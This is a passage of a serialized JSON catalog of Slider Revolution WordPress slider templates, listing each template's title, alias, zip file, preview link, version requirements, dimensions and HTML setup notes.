Slider\",\"alias\":\"ourteam\",\"zip\":\"ourteam.zip\",\"uid\":\"d8eb1fec07a79202d1118bb17f70c233\",\"img\":\"ourteam\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/thumbnail-hover-slider-revolution-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=thumbnail-hover-slider-revolution-plugin\",\"version\":\"1.0.0\",\"required\":\"5.1.4\",\"width\":\"1400\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">A team slider that changes slides and displays additional information on thumbnail hover. It uses <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> to achieve this effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>It might be helpful to use the \\\"hide\\/show layer\\\" feature to efficiently edit all content.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\nLearn how to <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/modify-thumbnails-for-our-team-template\\/\\\" target=\\\"_blank\\\">modify the thumbnails<\\/a><br\\/><br\\/>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"52\":{\"id\":\"53\",\"title\":\"Team Carousel\",\"alias\":\"our-team-carousel\",\"zip\":\"our-team-carousel.zip\",\"uid\":\"37656d5dcab1f265c025cb2a3d669809\",\"img\":\"ourteamcarousel\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/thumbnail-hover-carousel-slider-revolution-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=thumbnail-hover-carousel-slider-revolution-plugin\",\"version\":\"1.0.0\",\"required\":\"5.1.4\",\"width\":\"1000\",\"height\":\"800\",\"description\":\" <span class=\\\"ttm_content\\\">A team carousel that changes slides and displays additional information on thumbnail hover. It uses <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> to achieve this effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content carousel. Edit the slides to change images and texts.<br\\/>It might be helpful to use the \\\"hide\\/show layer\\\" feature to efficiently edit all content.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\nLearn how to <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/modify-thumbnails-for-our-team-template\\/\\\" target=\\\"_blank\\\">modify the thumbnails<\\/a><br\\/><br\\/>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"53\":{\"id\":\"54\",\"title\":\"4K Youtube Slider\",\"alias\":\"betteryoutube\",\"zip\":\"betteryoutube.zip\",\"uid\":\"d7c5fef9f257037d7a148038aa2a1857\",\"img\":\"betteryoutube\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/fullscreen-4k-youtube-video-gallery-slider-revolution-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fullscreen-4k-youtube-video-gallery-slider-revolution-plugin\",\"version\":\"1.0.2\",\"required\":\"5.1.4\",\"width\":\"1200\",\"height\":\"675\",\"description\":\" <span class=\\\"ttm_content\\\">A full-screen youtube gallery with 4K videos as an example. <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> are used to breathe life into navigation elements.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change videos and texts.<br\\/>It might be helpful to use the \\\"hide\\/show layer\\\" feature to efficiently edit all content.<br\\/><br\\/><\\/span>\\r\\nScreencast for <a href=\\\"https:\\/\\/www.youtube.com\\/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\\\" target=\\\"_blank\\\">mobile video<\\/a> considerations.<\\/a>\\r\\n<br\\/><br\\/>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"54\":{\"id\":\"55\",\"title\":\"Agency Website Header\",\"alias\":\"agencywebsiteheader\",\"zip\":\"agencywebsiteheader.zip\",\"uid\":\"c11d272c87277a7a38d9e7fd13e27947\",\"img\":\"agencywebsiteheader\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/fullscreen-hero-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=fullscreen-hero-slider\",\"version\":\"1.0.0\",\"required\":\"5.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\" <span class=\\\"ttm_content\\\">A very unique full-screen slider that uses <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> to their potential.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>It might be helpful to use the \\\"hide\\/show layer\\\" feature to efficiently edit all content.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"55\":{\"id\":\"56\",\"title\":\"Coming Soon\",\"alias\":\"comingsoon\",\"zip\":\"comingsoon.zip\",\"uid\":\"0f89edf995512e6d6e864a2ee7221829\",\"img\":\"comingsoon\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/coming-soon-wordpress-under-construction-site\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coming-soon-wordpress-under-construction-site\",\"version\":\"1.0.0\",\"required\":\"5.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider that can be used as a \\\"Coming Soon\\\" page. <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\" target=\\\"_blank\\\">\\\"Layer Actions\\\"<\\/a> are used to achieve various interaction possibilities.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>For further configuration options please view the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">\\\"Custom CSS\\/JS\\\"<\\/a> section in the slider settings.<br\\/><br\\/><\\/span>\\r\\nInstructions for <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/change-date-for-coming-soon-template\\/\\\" target=\\\"_blank\\\">how to change the date.<\\/a><br \\/><br \\/>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"56\":{\"id\":\"57\",\"title\":\"Christmas Snow Scene\",\"alias\":\"snowscene\",\"zip\":\"snowscene.zip\",\"uid\":\"a747bf0837caff86c62419a746690209\",\"img\":\"snowscene\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/christmas-snow-scene\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=christmas-snow-scene\",\"version\":\"1.0.5\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A slider with multiple christmas themed slides and a neat snow fall effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>For further configuration options please view the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">\\\"Custom CSS\\/JS\\\"<\\/a> section in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-snow-addon\\\\\\/revslider-snow-addon.php\\\",\\\"name\\\":\\\"Snow AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"57\":{\"id\":\"58\",\"title\":\"Rock Band Music\",\"alias\":\"rockband\",\"zip\":\"rockband.zip\",\"uid\":\"5f557a5fad2fd6ca982a6ae6e9619637\",\"img\":\"rockband\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/rock-band-music-theme-slider-revolution-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rock-band-music-theme-slider-revolution-plugin\",\"version\":\"1.0.0\",\"required\":\"5.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\" <span class=\\\"ttm_content\\\">A rock band themed hero block slider with an embedded SoundCloud element.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background video and texts.<br\\/><br\\/><\\/span>\\r\\nScreencast for <a href=\\\"https:\\/\\/www.youtube.com\\/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\\\" target=\\\"_blank\\\">mobile video<\\/a> considerations.<\\/a>\\r\\n<br\\/><br\\/>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"58\":{\"id\":\"59\",\"title\":\"Sleek Landing Page\",\"alias\":\"sleeklandingpage\",\"zip\":\"sleeklandingpage.zip\",\"uid\":\"07f7f2608936a8ae226213b7d99eee3f\",\"img\":\"sleeklandingpage\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/landing-page-free-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=landing-page-free-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"5.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider that can be used as an App-Landing-Page. The object layers and custom animations create a unique effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-22 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"59\":{\"id\":\"60\",\"title\":\"App Landing Page\",\"alias\":\"applandingpage\",\"zip\":\"applandingpage.zip\",\"uid\":\"38eb600893c1484ab8fd2a3dce3678d7\",\"img\":\"applandingpage\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/app-landing-page-free-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=app-landing-page-free-template\",\"version\":\"1.0.0\",\"required\":\"5.2.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen hero block that can be used as an app landing page. The detail view is build using <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\">\\\"Layer Actions\\\"<\\/a>.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>It might be helpful to use the \\\"hide\\/show layer\\\" feature to efficiently edit all content.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"60\":{\"id\":\"61\",\"title\":\"Desk Scene\",\"alias\":\"deskscene\",\"zip\":\"deskscene.zip\",\"uid\":\"172a1a89a3e3b333cb4dbeb238f534c5\",\"img\":\"deskscene\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/hero-desk-scene\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=hero-desk-scene\",\"version\":\"1.0.0\",\"required\":\"5.2.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A beautiful desk scene with a cool reveal effect when scrolling down.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"61\":{\"id\":\"62\",\"title\":\"Clean News Slider\",\"alias\":\"cleannewsslider\",\"zip\":\"cleannewsslider.zip\",\"uid\":\"82c3f521fe31b80984be0f19e1a9899e\",\"img\":\"cleannewsslider\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-news-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-news-slider\",\"version\":\"1.0.0\",\"required\":\"5.2.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A slideshow example with clean content and thumbnail navigation.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\\r\\n\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"62\":{\"id\":\"63\",\"title\":\"Image Gallery\",\"alias\":\"imagegallery\",\"zip\":\"imagegallery.zip\",\"uid\":\"cef1d75357df2cb53b990c74a214813e\",\"img\":\"imagegallery\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-photo-gallery-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-photo-gallery-plugin\",\"version\":\"1.0.0\",\"required\":\"5.2.0\",\"width\":\"1000\",\"height\":\"667\",\"description\":\"<span class=\\\"ttm_content\\\">A photo gallery suitable to display your images using <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\">\\\"Layer Actions\\\"<\\/a> to their potential.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"63\":{\"id\":\"64\",\"title\":\"Standard WP Gallery\",\"alias\":\"standard-wp-gallery\",\"zip\":\"standard-wp-gallery.zip\",\"uid\":\"632035b8a27652d8081dbdfa343dc93d\",\"img\":\"standard-wp-gallery\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-photo-gallery-plugin\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-photo-gallery-plugin\",\"version\":\"1.0.0\",\"required\":\"5.2.0\",\"width\":\"1000\",\"height\":\"667\",\"description\":\"<span class=\\\"ttm_content\\\">A photo gallery that uses the \\\"Standard WP Gallery\\\" add-on to display images.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">Please follow the setup guide on the \\\"Standard WP Gallery\\\" add-on page.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"postbased\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-gallery-addon\\\\\\/revslider-gallery-addon.php\\\",\\\"name\\\":\\\"WP Gallery AddOn\\\",\\\"url\\\":\\\"http:\\\\\\/\\\\\\/revolution.themepunch.com\\\\\\/wordpress-photo-gallery-plugin\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"64\":{\"id\":\"65\",\"title\":\"Clean News Post Based\",\"alias\":\"clean-news-post-based\",\"zip\":\"clean-news-post-based.zip\",\"uid\":\"f4cf5bbe51afa5a361754bb081cbabf2\",\"img\":\"clean-news-post-based\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-news-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-news-slider\",\"version\":\"1.0.0\",\"required\":\"5.2.0\",\"width\":\"1200\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\"> This slider is automatically populated by WordPress posts.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The content source is set to <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/module-content\\/#flickr\\\" target=\\\"_blank\\\">\\\"Post-Based Slider\\\"<\\/a>. Make sure to select the post type you want to display in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"postbased\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"65\":{\"id\":\"66\",\"title\":\"Interactive Whiteboard\",\"alias\":\"interactivewhiteboard\",\"zip\":\"interactivewhiteboard.zip\",\"uid\":\"058b4af535d6c6c7bcec5225845e3eb4\",\"img\":\"interactivewhiteboard\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/interactive-whiteboard-animation-free-addon\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=interactive-whiteboard-animation-free-addon\",\"version\":\"1.0.5\",\"required\":\"5.2.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This is the example slider from the Whiteboard add-on preview.<br\\/><a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\">\\\"Layer Actions\\\"<\\/a> are used to achieve certain effects.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This slider template requires the <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/whiteboard-addon\\/\\\" target=\\\"_blank\\\">Whiteboard add-on<\\/a> to be installed. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-whiteboard-addon\\\\\\/revslider-whiteboard-addon.php\\\",\\\"name\\\":\\\"Whiteboard AddOn\\\",\\\"url\\\":\\\"http:\\\\\\/\\\\\\/revolution.themepunch.com\\\\\\/interactive-whiteboard-animation-free-addon\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"66\":{\"id\":\"68\",\"title\":\"Innovation Slider\",\"alias\":\"innovation\",\"zip\":\"innovation.zip\",\"uid\":\"d3440b69126d9c186fddc713b18b0002\",\"img\":\"innovation\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/best-wordpress-slider-plugin-2016\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=best-wordpress-slider-plugin-2016\",\"version\":\"1.0.5\",\"required\":\"5.2.3.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider with an elegant fade-out parallax effect. <a href=\\\"https:\\/\\/www.themepunch.com\\/revslider-doc\\/layer-settings\\/#layeractions\\\">\\\"Layer Actions\\\"<\\/a> are used for links on layers.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images, videos and texts.<br\\/>For further configuration options please view the <a href=\\\"https:\\/\\/https:\\/\\/www.themepunch.com\\/slider-revolution\\/custom-css-javascript\\/\\\" target=\\\"_blank\\\">\\\"Custom CSS\\/JS\\\"<\\/a> section in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-03-29 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"67\":{\"id\":\"69\",\"title\":\"Dark Content Block - Menu\",\"alias\":\"dark-fullsite-block-menu\",\"zip\":\"packs\\/dark-fullsite-block-menu.zip\",\"uid\":\"bf4bd226719d3c3d3146592976e31ca1\",\"img\":\"dark-fullsite-block-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/dark-wordpress-parallax-theme\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dark-wordpress-parallax-theme\",\"version\":\"1.0.0\",\"required\":\"5.2.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">You can use this slider as a module on your website or install it as part of a slider pack.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Fullsite Dark\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"2\",\"installed\":false},\"68\":{\"id\":\"70\",\"title\":\"Dark Content Block - 